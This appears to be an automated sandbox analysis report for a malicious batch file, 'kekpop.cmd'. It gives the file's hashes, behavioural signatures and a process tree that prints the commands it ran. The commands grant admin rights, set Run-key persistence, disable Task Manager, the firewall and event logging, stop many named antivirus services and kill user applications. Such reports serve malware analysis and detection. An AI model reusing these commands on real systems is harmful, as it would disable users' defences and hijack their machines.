Analysis
-
max time kernel
75s -
max time network
49s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
13/05/2022, 16:49
Static task
static1
Behavioral task
behavioral1
Sample
kekpop.cmd
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
kekpop.cmd
Resource
win10v2004-20220414-en
General
-
Target
kekpop.cmd
-
Size
47KB
-
MD5
f190183b6a6f55daa406c25cf5da66d8
-
SHA1
89168542e0cec21bbafeafe39361994194576f61
-
SHA256
ea81248fddbf9080018845bf7862b9ceb8ab942526c1adcf20030f043c57ad99
-
SHA512
e28483273e68945b12baf8319ddafc58a65e82883c79fec47add970429f7b8ac02d91b7f68612058c0530ae6bfd66af959a0f6222e09acc81e816ca34c3ec448
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Disables Task Manager via registry modification
-
Modifies Windows Firewall 1 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_6759_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kekpop.cmd" reg.exe Key created \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\.bat" reg.exe -
Kills process with taskkill 1 IoCs
pid Process 1664 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1820 reg.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Temp\%qBRee:~23 cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 1468 powershell.exe 1468 powershell.exe 1868 tskill.exe 1868 tskill.exe 1656 tskill.exe 1656 tskill.exe 560 tskill.exe 560 tskill.exe 1340 tskill.exe 1340 tskill.exe 1672 tskill.exe 1672 tskill.exe 1900 tskill.exe 1900 tskill.exe 812 tskill.exe 812 tskill.exe 1688 tskill.exe 1688 tskill.exe 968 tskill.exe 968 tskill.exe 1904 tskill.exe 1904 tskill.exe 1276 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1468 powershell.exe Token: SeDebugPrivilege 1664 taskkill.exe Token: SeDebugPrivilege 1276 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1296 wrote to memory of 1988 1296 cmd.exe 28 PID 1296 wrote to memory of 1988 1296 cmd.exe 28 PID 1296 wrote to memory of 1988 1296 cmd.exe 28 PID 1296 wrote to memory of 1468 1296 cmd.exe 29 PID 1296 wrote to memory of 1468 1296 cmd.exe 29 PID 1296 wrote to memory of 1468 1296 cmd.exe 29 PID 1296 wrote to memory of 1564 1296 cmd.exe 30 PID 1296 wrote to memory of 1564 1296 cmd.exe 30 PID 1296 wrote to memory of 1564 1296 cmd.exe 30 PID 1564 wrote to memory of 1760 1564 net.exe 31 PID 1564 wrote to memory of 1760 1564 net.exe 31 PID 1564 wrote to memory of 1760 1564 net.exe 31 PID 1296 wrote to memory of 1608 1296 cmd.exe 32 PID 1296 wrote to memory of 1608 1296 cmd.exe 32 PID 1296 wrote to memory of 1608 1296 cmd.exe 32 PID 1296 wrote to memory of 1820 1296 cmd.exe 33 PID 1296 wrote to memory of 1820 1296 cmd.exe 33 PID 1296 wrote to memory of 1820 1296 cmd.exe 33 PID 1296 wrote to memory of 1628 1296 cmd.exe 34 PID 1296 wrote to memory of 1628 1296 cmd.exe 34 PID 1296 wrote to memory of 1628 1296 cmd.exe 34 PID 1296 wrote to memory of 1548 1296 cmd.exe 35 PID 1296 wrote to memory of 1548 1296 cmd.exe 35 PID 1296 wrote to memory of 1548 1296 cmd.exe 35 PID 1296 wrote to memory of 1532 1296 cmd.exe 38 PID 1296 wrote to memory of 1532 1296 cmd.exe 38 PID 1296 wrote to memory of 1532 1296 cmd.exe 38 PID 1296 wrote to memory of 1340 1296 cmd.exe 36 PID 1296 wrote to memory of 1340 1296 cmd.exe 36 PID 1296 wrote to memory of 1340 1296 cmd.exe 36 PID 1340 wrote to memory of 1772 1340 net.exe 39 PID 1340 wrote to memory of 1772 1340 net.exe 39 PID 1340 wrote to memory of 1772 1340 net.exe 39 PID 1296 wrote to memory of 1664 1296 cmd.exe 40 PID 1296 wrote to memory of 1664 1296 cmd.exe 40 PID 1296 wrote to memory of 1664 1296 cmd.exe 40 PID 1532 wrote to memory of 1700 1532 cmd.exe 41 PID 1532 wrote to memory of 1700 1532 cmd.exe 41 PID 1532 wrote to memory of 1700 1532 cmd.exe 41 PID 1296 wrote to memory of 1560 1296 cmd.exe 43 PID 1296 wrote to memory of 1560 1296 cmd.exe 43 PID 1296 wrote to memory of 1560 1296 cmd.exe 43 PID 1560 wrote to memory of 1868 1560 net.exe 44 PID 1560 wrote to memory of 1868 1560 net.exe 44 PID 1560 wrote to memory of 1868 1560 net.exe 44 PID 1296 wrote to memory of 700 1296 cmd.exe 45 PID 1296 wrote to memory of 700 1296 cmd.exe 45 PID 1296 wrote to memory of 700 1296 cmd.exe 45 PID 700 wrote to memory of 1012 700 net.exe 46 PID 700 wrote to memory of 1012 700 net.exe 46 PID 700 wrote to memory of 1012 700 net.exe 46 PID 1296 wrote to memory of 1840 1296 cmd.exe 47 PID 1296 wrote to memory of 1840 1296 cmd.exe 47 PID 1296 wrote to memory of 1840 1296 cmd.exe 47 PID 1840 wrote to memory of 1224 1840 net.exe 48 PID 1840 wrote to memory of 1224 1840 net.exe 48 PID 1840 wrote to memory of 1224 1840 net.exe 48 PID 1296 wrote to memory of 952 1296 cmd.exe 49 PID 1296 wrote to memory of 952 1296 cmd.exe 49 PID 1296 wrote to memory of 952 1296 cmd.exe 49 PID 1296 wrote to memory of 1072 1296 cmd.exe 50 PID 1296 wrote to memory of 1072 1296 cmd.exe 50 PID 1296 wrote to memory of 1072 1296 cmd.exe 50 PID 1296 wrote to memory of 1736 1296 cmd.exe 51 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1988 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\kekpop.cmd"1⤵
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:1296 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\kekpop.cmd2⤵
- Views/modifies file attributes
PID:1988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD3⤵PID:1760
-
-
-
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_6759_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\kekpop.cmd /f2⤵
- Adds Run key to start application
PID:1608
-
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\.bat /f2⤵
- Adds Run key to start application
- Modifies registry key
PID:1820
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f2⤵PID:1628
-
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵PID:1548
-
-
C:\Windows\system32\net.exenet stop "WinDefend"2⤵
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"3⤵PID:1772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1700
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1400
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1620
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1976
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1728
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1056
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im "MSASCui.exe"2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1664
-
-
C:\Windows\system32\net.exenet stop "wuauserv"2⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wuauserv"3⤵PID:1868
-
-
-
C:\Windows\system32\net.exenet stop "security center"2⤵
- Suspicious use of WriteProcessMemory
PID:700 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "security center"3⤵PID:1012
-
-
-
C:\Windows\system32\net.exenet stop sharedaccess2⤵
- Suspicious use of WriteProcessMemory
PID:1840 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sharedaccess3⤵PID:1224
-
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode-disable2⤵PID:952
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1072
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1736
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:668
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1788
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1668
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1120
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1996
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1784
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1180
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1808
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:940
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1608
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1628
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1772
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1176
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1664
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1156
-
-
C:\Windows\system32\net.exenet stop "Security Center" /y2⤵PID:1904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Security Center" /y3⤵PID:1276
-
-
-
C:\Windows\system32\net.exenet stop "Automatic Updates" /y2⤵PID:1896
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Automatic Updates" /y3⤵PID:1348
-
-
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵PID:1448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵PID:1396
-
-
-
C:\Windows\system32\net.exenet stop "SAVScan" /y2⤵PID:1504
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVScan" /y3⤵PID:1556
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Firewall Monitor Service" /y2⤵PID:1620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y3⤵PID:468
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto-Protect Service" /y2⤵PID:1604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y3⤵PID:336
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:1340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵PID:1068
-
-
-
C:\Windows\system32\net.exenet stop "McAfee Spamkiller Server" /y2⤵PID:1672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y3⤵PID:1900
-
-
-
C:\Windows\system32\net.exenet stop "McAfee Personal Firewall Service" /y2⤵PID:1904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y3⤵PID:812
-
-
-
C:\Windows\system32\net.exenet stop "McAfee SecurityCenter Update Manager" /y2⤵PID:1896
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y3⤵PID:1076
-
-
-
C:\Windows\system32\net.exenet stop "Symantec SPBBCSvc" /y2⤵PID:1448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y3⤵PID:936
-
-
-
C:\Windows\system32\net.exenet stop "Ahnlab Task Scheduler" /y2⤵PID:1504
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y3⤵PID:1468
-
-
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵PID:1620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵PID:1676
-
-
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:1604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵PID:1732
-
-
-
C:\Windows\system32\net.exenet stop vrmonsvc /y2⤵PID:1068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vrmonsvc /y3⤵PID:1340
-
-
-
C:\Windows\system32\net.exenet stop MonSvcNT /y2⤵PID:560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MonSvcNT /y3⤵PID:1900
-
-
-
C:\Windows\system32\net.exenet stop SAVScan /y2⤵PID:1672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVScan /y3⤵PID:1688
-
-
-
C:\Windows\system32\net.exenet stop NProtectService /y2⤵PID:812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NProtectService /y3⤵PID:1904
-
-
-
C:\Windows\system32\net.exenet stop ccSetMGR /y2⤵PID:968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMGR /y3⤵PID:1076
-
-
-
C:\Windows\system32\net.exenet stop ccEvtMGR /y2⤵PID:1896
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMGR /y3⤵PID:1716
-
-
-
C:\Windows\system32\net.exenet stop srservice /y2⤵PID:936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop srservice /y3⤵PID:1448
-
-
-
C:\Windows\system32\net.exenet stop "Symantec Network Drivers Service" /y2⤵PID:1836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y3⤵PID:1468
-
-
-
C:\Windows\system32\net.exenet stop "norton Unerase Protection" /y2⤵PID:1504
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton Unerase Protection" /y3⤵PID:1744
-
-
-
C:\Windows\system32\net.exenet stop MskService /y2⤵PID:1676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MskService /y3⤵PID:1620
-
-
-
C:\Windows\system32\net.exenet stop MpfService /y2⤵PID:1732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MpfService /y3⤵PID:1604
-
-
-
C:\Windows\system32\net.exenet stop mcupdmgr.exe /y2⤵PID:1340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mcupdmgr.exe /y3⤵PID:1068
-
-
-
C:\Windows\system32\net.exenet stop "McAfeeAntiSpyware" /y2⤵PID:1900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y3⤵PID:560
-
-
-
C:\Windows\system32\net.exenet stop helpsvc /y2⤵PID:1688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop helpsvc /y3⤵PID:1672
-
-
-
C:\Windows\system32\net.exenet stop ERSvc /y2⤵PID:1904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ERSvc /y3⤵PID:812
-
-
-
C:\Windows\system32\net.exenet stop "*norton*" /y2⤵PID:1076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*norton*" /y3⤵PID:968
-
-
-
C:\Windows\system32\net.exenet stop "*Symantec*" /y2⤵PID:1716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*Symantec*" /y3⤵PID:1896
-
-
-
C:\Windows\system32\net.exenet stop "*McAfee*" /y2⤵PID:1448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*McAfee*" /y3⤵PID:936
-
-
-
C:\Windows\system32\net.exenet stop ccPwdSvc /y2⤵PID:1468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccPwdSvc /y3⤵PID:1836
-
-
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵PID:1744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵PID:1504
-
-
-
C:\Windows\system32\net.exenet stop navapsvc /y2⤵PID:1620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop navapsvc /y3⤵PID:1676
-
-
-
C:\Windows\system32\net.exenet stop "Serv-U" /y2⤵PID:1604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Serv-U" /y3⤵PID:1732
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:1068
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵PID:1340
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵PID:560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵PID:1900
-
-
-
C:\Windows\system32\net.exenet stop "Symantec AntiVirus Client" /y2⤵PID:1672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y3⤵PID:1688
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Server" /y2⤵PID:812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Server" /y3⤵PID:1904
-
-
-
C:\Windows\system32\net.exenet stop "NAV Alert" /y2⤵PID:968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NAV Alert" /y3⤵PID:1076
-
-
-
C:\Windows\system32\net.exenet stop "Nav Auto-Protect" /y2⤵PID:1896
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Nav Auto-Protect" /y3⤵PID:1716
-
-
-
C:\Windows\system32\net.exenet stop "McShield" /y2⤵PID:936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield" /y3⤵PID:1448
-
-
-
C:\Windows\system32\net.exenet stop "DefWatch" /y2⤵PID:1836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "DefWatch" /y3⤵PID:1468
-
-
-
C:\Windows\system32\net.exenet stop eventlog /y2⤵PID:1504
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop eventlog /y3⤵PID:1744
-
-
-
C:\Windows\system32\net.exenet stop InoRPC /y2⤵PID:1676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRPC /y3⤵PID:1620
-
-
-
C:\Windows\system32\net.exenet stop InoRT /y2⤵PID:1732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoRT /y3⤵PID:1604
-
-
-
C:\Windows\system32\net.exenet stop InoTask /y2⤵PID:1340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoTask /y3⤵PID:1068
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:1900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵PID:560
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Client" /y2⤵PID:1688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Client" /y3⤵PID:1672
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Corporate Edition" /y2⤵PID:1904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y3⤵PID:812
-
-
-
C:\Windows\system32\net.exenet stop "ViRobot Professional Monitoring" /y2⤵PID:1076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y3⤵PID:968
-
-
-
C:\Windows\system32\net.exenet stop "PC-cillin Personal Firewall" /y2⤵PID:1716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y3⤵PID:1896
-
-
-
C:\Windows\system32\net.exenet stop "Trend Micro Proxy Service" /y2⤵PID:1448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y3⤵PID:936
-
-
-
C:\Windows\system32\net.exenet stop "Trend NT Realtime Service" /y2⤵PID:1468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend NT Realtime Service" /y3⤵PID:1836
-
-
-
C:\Windows\system32\net.exenet stop "McAfee.com McShield" /y2⤵PID:1744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com McShield" /y3⤵PID:1504
-
-
-
C:\Windows\system32\net.exenet stop "McAfee.com VirusScan Online Realtime Engine" /y2⤵PID:1348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y3⤵PID:1868
-
-
-
C:\Windows\system32\net.exenet stop "SyGateService" /y2⤵PID:1340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SyGateService" /y3⤵PID:560
-
-
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:1900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵PID:1672
-
-
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus" /y2⤵PID:1688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus" /y3⤵PID:812
-
-
-
C:\Windows\system32\net.exenet stop "Sophos Anti-Virus Network" /y2⤵PID:1904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y3⤵PID:968
-
-
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Job Server" /y2⤵PID:1076
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y3⤵PID:1896
-
-
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus Realtime Server" /y2⤵PID:1716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y3⤵PID:936
-
-
-
C:\Windows\system32\net.exenet stop "Sygate Personal Firewall Pro" /y2⤵PID:1448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y3⤵PID:1836
-
-
-
C:\Windows\system32\net.exenet stop "eTrust Antivirus RPC Server" /y2⤵PID:1468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y3⤵PID:1400
-
-
-
C:\Windows\system32\net.exenet stop netsvcs2⤵PID:1136
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop netsvcs3⤵PID:1744
-
-
-
C:\Windows\system32\net.exenet stop spoolnt2⤵PID:1748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop spoolnt3⤵PID:1732
-
-
-
C:\Windows\system32\tskill.exetskill iexplore2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1868
-
-
C:\Windows\system32\tskill.exetskill msnmsgr2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1656
-
-
C:\Windows\system32\tskill.exetskill excel2⤵
- Suspicious behavior: EnumeratesProcesses
PID:560
-
-
C:\Windows\system32\tskill.exetskill iTunes2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1340
-
-
C:\Windows\system32\tskill.exetskill calc2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1672
-
-
C:\Windows\system32\tskill.exetskill msaccess2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1900
-
-
C:\Windows\system32\tskill.exetskill safari2⤵
- Suspicious behavior: EnumeratesProcesses
PID:812
-
-
C:\Windows\system32\tskill.exetskill mspaint2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1688
-
-
C:\Windows\system32\tskill.exetskill outlook2⤵
- Suspicious behavior: EnumeratesProcesses
PID:968
-
-
C:\Windows\system32\tskill.exetskill WINWORD2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1904
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\ApproveSkip.ps12⤵PID:1896
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\CloseDismount.clr2⤵PID:1076
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\CloseSet.WTV2⤵PID:936
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\ConfirmConvertTo.ps12⤵PID:1716
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\ConnectGroup.ppsm2⤵PID:468
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\ExportTrace.xht2⤵PID:1056
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\InitializeCompress.docx2⤵PID:1224
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\InstallBlock.xps2⤵PID:2016
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\InvokeReset.wmf2⤵PID:1676
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\LimitRevoke.jpe2⤵PID:1504
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\NewLimit.3gp2⤵PID:1604
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\NewMount.easmx2⤵PID:1620
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\OpenGroup.wmv2⤵PID:1348
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\RedoRemove.MOD2⤵PID:1276
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\RepairExport.xlsx2⤵PID:560
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\ResolveConvertFrom.rmi2⤵PID:1340
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\RestartApprove.aiff2⤵PID:1672
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\SplitMeasure.pptx2⤵PID:1900
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\UndoRepair.wav2⤵PID:812
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Desktop\UnregisterCheckpoint.exe2⤵PID:1688
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\Are.docx2⤵PID:968
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\black.bat2⤵PID:1904
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\ConvertFromEnable.rtf2⤵PID:1896
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\DenyResume.ods2⤵PID:1684
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\DismountPing.odt2⤵PID:1452
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\ExitClear.odp2⤵PID:468
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\ExportSync.vsw2⤵PID:1224
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\Files.docx2⤵PID:1744
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\FormatNew.mhtml2⤵PID:1136
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\FormatUnlock.xml2⤵PID:1732
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\GrantDebug.pps2⤵PID:1748
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\ImportSearch.pps2⤵PID:1868
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\JoinPush.xps2⤵PID:1656
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\Opened.docx2⤵PID:112
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\PingExpand.pub2⤵PID:1556
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\PopGrant.vsx2⤵PID:1700
-
-
C:\Windows\system32\xcopy.exexcopy /y C:\Users\Admin\Documents\PublishWrite.docm2⤵PID:1760
-
-
